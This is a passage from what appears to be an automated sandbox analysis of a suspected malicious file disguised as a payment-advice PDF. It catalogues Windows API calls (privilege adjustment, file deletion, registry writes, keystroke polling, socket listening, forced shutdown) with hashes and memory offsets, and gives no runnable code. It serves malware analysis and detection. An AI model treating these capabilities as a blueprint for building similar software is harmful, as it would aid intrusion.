                                                              • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0089840A
                                                                • Part of subcall function 008981CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00898309), ref: 008981E0
                                                                • Part of subcall function 008981CB: CloseHandle.KERNEL32(?,?,00898309), ref: 008981F2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                              • String ID: $default$winsta0
                                                              • API String ID: 2063423040-1027155976
                                                              • Opcode ID: 71223cfc49e8dda98fe0c17a3f7e66aa9472878586bc2b9e664ff25d6b89e326
                                                              • Instruction ID: 368bed53f275e1f950d3097c867a0135313d6e20d859a92a19f8dbce5e6c0ce4
                                                              • Opcode Fuzzy Hash: 71223cfc49e8dda98fe0c17a3f7e66aa9472878586bc2b9e664ff25d6b89e326
                                                              • Instruction Fuzzy Hash: E781277190024AEFEF11AFA4DC45EEEBBB9FF05304F184169F914E6261DB318A19DB21
                                                              APIs
                                                              • FindFirstFileW.KERNEL32(?,?), ref: 008AC78D
                                                              • FindClose.KERNEL32(00000000), ref: 008AC7E1
                                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 008AC806
                                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 008AC81D
                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 008AC844
                                                              • __swprintf.LIBCMT ref: 008AC890
                                                              • __swprintf.LIBCMT ref: 008AC8D3
                                                                • Part of subcall function 00847DE1: _memmove.LIBCMT ref: 00847E22
                                                              • __swprintf.LIBCMT ref: 008AC927
                                                                • Part of subcall function 00863698: __woutput_l.LIBCMT ref: 008636F1
                                                              • __swprintf.LIBCMT ref: 008AC975
                                                                • Part of subcall function 00863698: __flsbuf.LIBCMT ref: 00863713
                                                                • Part of subcall function 00863698: __flsbuf.LIBCMT ref: 0086372B
                                                              • __swprintf.LIBCMT ref: 008AC9C4
                                                              • __swprintf.LIBCMT ref: 008ACA13
                                                              • __swprintf.LIBCMT ref: 008ACA62
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                              • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                              • API String ID: 3953360268-2428617273
                                                              • Opcode ID: 202c127e2887a35f327d55106375989692c8e15a9424a80c95a40eefe6266359
                                                              • Instruction ID: 6ba3df5cdca47c601f0cf13f8c5fc9838756ea9d5a7fb0d13a1490feb8528a87
                                                              • Opcode Fuzzy Hash: 202c127e2887a35f327d55106375989692c8e15a9424a80c95a40eefe6266359
                                                              • Instruction Fuzzy Hash: AEA11EB1408209ABD750EFA8C885DAFB7ECFF95704F404929F595C6192EB34DA08CB63
                                                              APIs
                                                              • FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 008AEFB6
                                                              • _wcscmp.LIBCMT ref: 008AEFCB
                                                              • _wcscmp.LIBCMT ref: 008AEFE2
                                                              • GetFileAttributesW.KERNEL32(?), ref: 008AEFF4
                                                              • SetFileAttributesW.KERNEL32(?,?), ref: 008AF00E
                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 008AF026
                                                              • FindClose.KERNEL32(00000000), ref: 008AF031
                                                              • FindFirstFileW.KERNEL32(*.*,?), ref: 008AF04D
                                                              • _wcscmp.LIBCMT ref: 008AF074
                                                              • _wcscmp.LIBCMT ref: 008AF08B
                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 008AF09D
                                                              • SetCurrentDirectoryW.KERNEL32(008F8920), ref: 008AF0BB
                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 008AF0C5
                                                              • FindClose.KERNEL32(00000000), ref: 008AF0D2
                                                              • FindClose.KERNEL32(00000000), ref: 008AF0E4
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                              • String ID: *.*
                                                              • API String ID: 1803514871-438819550
                                                              • Opcode ID: 5579b8e4747d5001b6bd8b7cd040d8380a7d0eeac138c8f2aa995733ae19f7c9
                                                              • Instruction ID: 7c611256b8e39afa92fd15eddb4af9e3234f126238d8ce900163006c6eaba008
                                                              • Opcode Fuzzy Hash: 5579b8e4747d5001b6bd8b7cd040d8380a7d0eeac138c8f2aa995733ae19f7c9
                                                              • Instruction Fuzzy Hash: 3C31D232600608ABEB149BB4EC48EEEB7ADFF4A360F104175EA10D3193DB74DA44CE61
                                                              APIs
                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 008C0953
                                                              • RegCreateKeyExW.ADVAPI32(?,?,00000000,008CF910,00000000,?,00000000,?,?), ref: 008C09C1
                                                              • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 008C0A09
                                                              • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 008C0A92
                                                              • RegCloseKey.ADVAPI32(?), ref: 008C0DB2
                                                              • RegCloseKey.ADVAPI32(00000000), ref: 008C0DBF
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Close$ConnectCreateRegistryValue
                                                              • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                              • API String ID: 536824911-966354055
                                                              • Opcode ID: d2807d0fd589cc39974fc470cfafa3b3782bf80e04569b0c1ab801cbc3a9f213
                                                              • Instruction ID: 40589f9ddc171e4e71af25b71a20d33e26f18311f37884b8cc46a4e2382bbe14
                                                              • Opcode Fuzzy Hash: d2807d0fd589cc39974fc470cfafa3b3782bf80e04569b0c1ab801cbc3a9f213
                                                              • Instruction Fuzzy Hash: 820246756006159FCB24EF28C841E2AB7E5FF89714F04856DF99ADB262CB31EC45CB82
                                                              APIs
                                                              • FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 008AF113
                                                              • _wcscmp.LIBCMT ref: 008AF128
                                                              • _wcscmp.LIBCMT ref: 008AF13F
                                                                • Part of subcall function 008A4385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 008A43A0
                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 008AF16E
                                                              • FindClose.KERNEL32(00000000), ref: 008AF179
                                                              • FindFirstFileW.KERNEL32(*.*,?), ref: 008AF195
                                                              • _wcscmp.LIBCMT ref: 008AF1BC
                                                              • _wcscmp.LIBCMT ref: 008AF1D3
                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 008AF1E5
                                                              • SetCurrentDirectoryW.KERNEL32(008F8920), ref: 008AF203
                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 008AF20D
                                                              • FindClose.KERNEL32(00000000), ref: 008AF21A
                                                              • FindClose.KERNEL32(00000000), ref: 008AF22C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                              • String ID: *.*
                                                              • API String ID: 1824444939-438819550
                                                              • Opcode ID: c06980c0f1edc0b593ce25605b08ef3dc8af41c2d02e85727e97a6861e0763e2
                                                              • Instruction ID: a16f0a753b28d981380b6c32bb34b22cb5ea36e89ecf9192a21ea3d7e90ccc98
                                                              • Opcode Fuzzy Hash: c06980c0f1edc0b593ce25605b08ef3dc8af41c2d02e85727e97a6861e0763e2
                                                              • Instruction Fuzzy Hash: 7D319136500219AAEB10AAB4EC49FEE77BDFF46360F100175EA10E35A2DB74DE45CA64
                                                              APIs
                                                              • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 008AA20F
                                                              • __swprintf.LIBCMT ref: 008AA231
                                                              • CreateDirectoryW.KERNEL32(?,00000000), ref: 008AA26E
                                                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 008AA293
                                                              • _memset.LIBCMT ref: 008AA2B2
                                                              • _wcsncpy.LIBCMT ref: 008AA2EE
                                                              • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 008AA323
                                                              • CloseHandle.KERNEL32(00000000), ref: 008AA32E
                                                              • RemoveDirectoryW.KERNEL32(?), ref: 008AA337
                                                              • CloseHandle.KERNEL32(00000000), ref: 008AA341
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                              • String ID: :$\$\??\%s
                                                              • API String ID: 2733774712-3457252023
                                                              • Opcode ID: 7ed8cd4bfbcfb6c1810182a0b2de6a86eaae7bc050261d782a3b33215f6c1880
                                                              • Instruction ID: 0135c985014062ee0729d22e1ede9b482671c3c0c60b976d46844b734adeeefe
                                                              • Opcode Fuzzy Hash: 7ed8cd4bfbcfb6c1810182a0b2de6a86eaae7bc050261d782a3b33215f6c1880
                                                              • Instruction Fuzzy Hash: DA31B0B1900109ABEB219FA4DC49FEB37BDFF89741F1040B6F608D2661EB709644CB25
                                                              APIs
                                                                • Part of subcall function 00898202: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 0089821E
                                                                • Part of subcall function 00898202: GetLastError.KERNEL32(?,00897CE2,?,?,?), ref: 00898228
                                                                • Part of subcall function 00898202: GetProcessHeap.KERNEL32(00000008,?,?,00897CE2,?,?,?), ref: 00898237
                                                                • Part of subcall function 00898202: HeapAlloc.KERNEL32(00000000,?,00897CE2,?,?,?), ref: 0089823E
                                                                • Part of subcall function 00898202: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00898255
                                                                • Part of subcall function 0089829F: GetProcessHeap.KERNEL32(00000008,00897CF8,00000000,00000000,?,00897CF8,?), ref: 008982AB
                                                                • Part of subcall function 0089829F: HeapAlloc.KERNEL32(00000000,?,00897CF8,?), ref: 008982B2
                                                                • Part of subcall function 0089829F: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00897CF8,?), ref: 008982C3
                                                              • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00897D13
                                                              • _memset.LIBCMT ref: 00897D28
                                                              • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00897D47
                                                              • GetLengthSid.ADVAPI32(?), ref: 00897D58
                                                              • GetAce.ADVAPI32(?,00000000,?), ref: 00897D95
                                                              • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00897DB1
                                                              • GetLengthSid.ADVAPI32(?), ref: 00897DCE
                                                              • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00897DDD
                                                              • HeapAlloc.KERNEL32(00000000), ref: 00897DE4
                                                              • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00897E05
                                                              • CopySid.ADVAPI32(00000000), ref: 00897E0C
                                                              • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00897E3D
                                                              • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00897E63
                                                              • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00897E77
                                                              Similarity
                                                              • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                              • String ID:
                                                              • API String ID: 3996160137-0
                                                              • Opcode ID: 0057255c887a8a400b7cdfae321d58643f0284b75a296a1361e8327becc03e08
                                                              • Instruction ID: f93262a85cc59cdb0facfb8ea958f7d55f20fbbea15a7041e2478e0eeea1522b
                                                              • Opcode Fuzzy Hash: 0057255c887a8a400b7cdfae321d58643f0284b75a296a1361e8327becc03e08
                                                              • Instruction Fuzzy Hash: 87611B7191450AEFEF01AFA4DC45EEEBB7AFF04700F088169F915E6291DB359A05CB60
                                                              Strings
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
                                                              • API String ID: 0-4052911093
                                                              • Opcode ID: 6a8b090b0e2a7e23e28475f31ae2d8931b87435b3b11cf31891e76f0afd96146
                                                              • Instruction ID: 91b73ae3022453e8770a925ed33b3ab1c6d3084176adcb41e3e2f5a6d84826f2
                                                              • Opcode Fuzzy Hash: 6a8b090b0e2a7e23e28475f31ae2d8931b87435b3b11cf31891e76f0afd96146
                                                              • Instruction Fuzzy Hash: 6572A175E0421ADBDF14DF58C8807AEB7B5FF48315F54816AE949EB280EB309E85CB90
                                                              APIs
                                                              • GetKeyboardState.USER32(?), ref: 008A0097
                                                              • SetKeyboardState.USER32(?), ref: 008A0102
                                                              • GetAsyncKeyState.USER32(000000A0), ref: 008A0122
                                                              • GetKeyState.USER32(000000A0), ref: 008A0139
                                                              • GetAsyncKeyState.USER32(000000A1), ref: 008A0168
                                                              • GetKeyState.USER32(000000A1), ref: 008A0179
                                                              • GetAsyncKeyState.USER32(00000011), ref: 008A01A5
                                                              • GetKeyState.USER32(00000011), ref: 008A01B3
                                                              • GetAsyncKeyState.USER32(00000012), ref: 008A01DC
                                                              • GetKeyState.USER32(00000012), ref: 008A01EA
                                                              • GetAsyncKeyState.USER32(0000005B), ref: 008A0213
                                                              • GetKeyState.USER32(0000005B), ref: 008A0221
                                                              Similarity
                                                              • API ID: State$Async$Keyboard
                                                              • String ID:
                                                              • API String ID: 541375521-0
                                                              • Opcode ID: 31178ea658400016c0a9b93ad5d761ddda8c8d17788a4062e522f781b2195986
                                                              • Instruction ID: 624d1c7590eb1c0cc6c978be53fcc5a00ebd747678c3e6c8f4c84e2567c9adc1
                                                              • Opcode Fuzzy Hash: 31178ea658400016c0a9b93ad5d761ddda8c8d17788a4062e522f781b2195986
                                                              • Instruction Fuzzy Hash: 1651CB2090478819FF35DBA488547EABFB4FF13380F08459995C19B9C3DAA49B8CCF62
                                                              APIs
                                                                • Part of subcall function 008C0E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,008BFDAD,?,?), ref: 008C0E31
                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 008C04AC
                                                                • Part of subcall function 00849837: __itow.LIBCMT ref: 00849862
                                                                • Part of subcall function 00849837: __swprintf.LIBCMT ref: 008498AC
                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 008C054B
                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 008C05E3
                                                              • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 008C0822
                                                              • RegCloseKey.ADVAPI32(00000000), ref: 008C082F
                                                              Similarity
                                                              • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                              • String ID:
                                                              • API String ID: 1240663315-0
                                                              • Opcode ID: f6f9e6f91db0446c22e8daf441c3ef5c2723c8782c906908d3e43b15fbcf91de
                                                              • Instruction ID: 8fecccb990ecb643476570593bd2db2ae18a88a76c79a6171bba835b6d811804
                                                              • Opcode Fuzzy Hash: f6f9e6f91db0446c22e8daf441c3ef5c2723c8782c906908d3e43b15fbcf91de
                                                              • Instruction Fuzzy Hash: 19E13B71204214EFCB14DF28C891E2ABBF5FF89754B04856DF94ADB262DA31E905CF92
                                                              APIs
                                                              Similarity
                                                              • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                              • String ID:
                                                              • API String ID: 1737998785-0
                                                              • Opcode ID: 5994cf3c91f2514377373456cb7c1c01f2413b87dc85bdd8dcb3e2494a113d83
                                                              • Instruction ID: ea5012f7d886fcb89268465c4a2d83a937299ab3dc8e1393b6eaba81cd22083a
                                                              • Opcode Fuzzy Hash: 5994cf3c91f2514377373456cb7c1c01f2413b87dc85bdd8dcb3e2494a113d83
                                                              • Instruction Fuzzy Hash: D62171356002159FEB10AF68DC09F6A7BB9FF54711F158025FA45DB3A2DB30AC01CB55
                                                              APIs
                                                                • Part of subcall function 00844750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00844743,?,?,008437AE,?), ref: 00844770
                                                                • Part of subcall function 008A4A31: GetFileAttributesW.KERNEL32(?,008A370B), ref: 008A4A32
                                                              • FindFirstFileW.KERNEL32(?,?), ref: 008A38A3
                                                              • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 008A394B
                                                              • MoveFileW.KERNEL32(?,?), ref: 008A395E
                                                              • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 008A397B
                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 008A399D
                                                              • FindClose.KERNEL32(00000000,?,?,?,?), ref: 008A39B9
                                                              Strings
                                                              Similarity
                                                              • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                              • String ID: \*.*
                                                              • API String ID: 4002782344-1173974218
                                                              • Opcode ID: fcf1986f1479e0326979b9a06c6ae75e70fc4252572e279101af1747b246f2da
                                                              • Instruction ID: dd2d4194288d0c5551aa7fe46aa50f50c3101d14440213697048708b73f994e5
                                                              • Opcode Fuzzy Hash: fcf1986f1479e0326979b9a06c6ae75e70fc4252572e279101af1747b246f2da
                                                              • Instruction Fuzzy Hash: 7251703180514CAADF01EBA4D992DEEBB79FF16300F640069F406F6592EB316F09CB52
                                                              APIs
                                                                • Part of subcall function 00847DE1: _memmove.LIBCMT ref: 00847E22
                                                              • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 008AF440
                                                              • Sleep.KERNEL32(0000000A), ref: 008AF470
                                                              • _wcscmp.LIBCMT ref: 008AF484
                                                              • _wcscmp.LIBCMT ref: 008AF49F
                                                              • FindNextFileW.KERNEL32(?,?), ref: 008AF53D
                                                              • FindClose.KERNEL32(00000000), ref: 008AF553
                                                              Strings
                                                              Similarity
                                                              • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                              • String ID: *.*
                                                              • API String ID: 713712311-438819550
                                                              • Opcode ID: c56f85916c09a3668b3efb622d4fbd5d5446817aa88e9ffc808a97ddd83dbeed
                                                              • Instruction ID: 7de922a256a12bfc656dc37d3cff8d45f3ab59c7e7e898eb7e414e36fcf5526d
                                                              • Opcode Fuzzy Hash: c56f85916c09a3668b3efb622d4fbd5d5446817aa88e9ffc808a97ddd83dbeed
                                                              • Instruction Fuzzy Hash: C0414B71D0021EABEF14DFA8DC59AEEBBB4FF05310F144566E915E2292EB309E44CB51
                                                              APIs
                                                              Similarity
                                                              • API ID: _memmove
                                                              • String ID:
                                                              • API String ID: 4104443479-0
                                                              • Opcode ID: 0339ab63a20667a75a85a58354f971d2d3b4aadbd82ede3d3590751988a6055c
                                                              • Instruction ID: 5c989bcebe0253a1b0a0497b6003a180cab43f740801a099da5d383a0b9ad894
                                                              • Opcode Fuzzy Hash: 0339ab63a20667a75a85a58354f971d2d3b4aadbd82ede3d3590751988a6055c
                                                              • Instruction Fuzzy Hash: B112AA70A00A09EFCF04DFA8D991AAEB7F5FF48300F144529E846E7251EB36AD24CB55
                                                              APIs
                                                                • Part of subcall function 00844750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00844743,?,?,008437AE,?), ref: 00844770
                                                                • Part of subcall function 008A4A31: GetFileAttributesW.KERNEL32(?,008A370B), ref: 008A4A32
                                                              • FindFirstFileW.KERNEL32(?,?), ref: 008A3B89
                                                              • DeleteFileW.KERNEL32(?,?,?,?), ref: 008A3BD9
                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 008A3BEA
                                                              • FindClose.KERNEL32(00000000), ref: 008A3C01
                                                              • FindClose.KERNEL32(00000000), ref: 008A3C0A
                                                              Strings
                                                              Similarity
                                                              • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                              • String ID: \*.*
                                                              • API String ID: 2649000838-1173974218
                                                              • Opcode ID: 4194bd1be73baf006b96e2cf2a94c6691c4d4b9b6e733d010db5a08f8b3e3814
                                                              • Instruction ID: 644014805ede1d7334fe3a20a6d3f063b9474efef212ff57b3485aff87dcd8a5
                                                              • Opcode Fuzzy Hash: 4194bd1be73baf006b96e2cf2a94c6691c4d4b9b6e733d010db5a08f8b3e3814
                                                              • Instruction Fuzzy Hash: C7316F310083899BD301EF28D895DAFBBA9FE92314F404D2DF4D5D2192EB359A09C763
                                                              APIs
                                                                • Part of subcall function 008987E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0089882B
                                                                • Part of subcall function 008987E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00898858
                                                                • Part of subcall function 008987E1: GetLastError.KERNEL32 ref: 00898865
                                                              • ExitWindowsEx.USER32(?,00000000), ref: 008A51F9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                               • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                              • String ID: $@$SeShutdownPrivilege
                                                              • API String ID: 2234035333-194228
                                                              • Opcode ID: f53858cde8f356d233297a80a0b5b0c4615cc2bc8a8856a960e548ac3d8ba490
                                                              • Instruction ID: d30f63fa91f3ca6556c7bec9193ed1df9474576b0e4139a4c792776b498f17e9
                                                              • Opcode Fuzzy Hash: f53858cde8f356d233297a80a0b5b0c4615cc2bc8a8856a960e548ac3d8ba490
                                                              • Instruction Fuzzy Hash: 8D012B317916156BF72862789C8AFBB7298FB07754F240431FA23E28D2DA611C808590
                                                              APIs
                                                              • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 008B62DC
                                                              • WSAGetLastError.WSOCK32(00000000), ref: 008B62EB
                                                              • bind.WSOCK32(00000000,?,00000010), ref: 008B6307
                                                              • listen.WSOCK32(00000000,00000005), ref: 008B6316
                                                              • WSAGetLastError.WSOCK32(00000000), ref: 008B6330
                                                              • closesocket.WSOCK32(00000000,00000000), ref: 008B6344
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                               • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$bindclosesocketlistensocket
                                                              • String ID:
                                                              • API String ID: 1279440585-0
                                                              • Opcode ID: ca4393113848827d2f9b7af2fc162b4e15d2ca2844bb3621b5e72a67c96b2e71
                                                              • Instruction ID: 448a499363b79471420cf90d97c531d2394a02893f0d9c03da3c4b56aec9324c
                                                              • Opcode Fuzzy Hash: ca4393113848827d2f9b7af2fc162b4e15d2ca2844bb3621b5e72a67c96b2e71
                                                              • Instruction Fuzzy Hash: E4219E316002089FDB10EF68D845EAEB7F9FF48720F144169E956E7392D774AD11CB52
                                                              APIs
                                                                • Part of subcall function 00860DB6: std::exception::exception.LIBCMT ref: 00860DEC
                                                                • Part of subcall function 00860DB6: __CxxThrowException@8.LIBCMT ref: 00860E01
                                                              • _memmove.LIBCMT ref: 00890258
                                                              • _memmove.LIBCMT ref: 0089036D
                                                              • _memmove.LIBCMT ref: 00890414
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                               • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
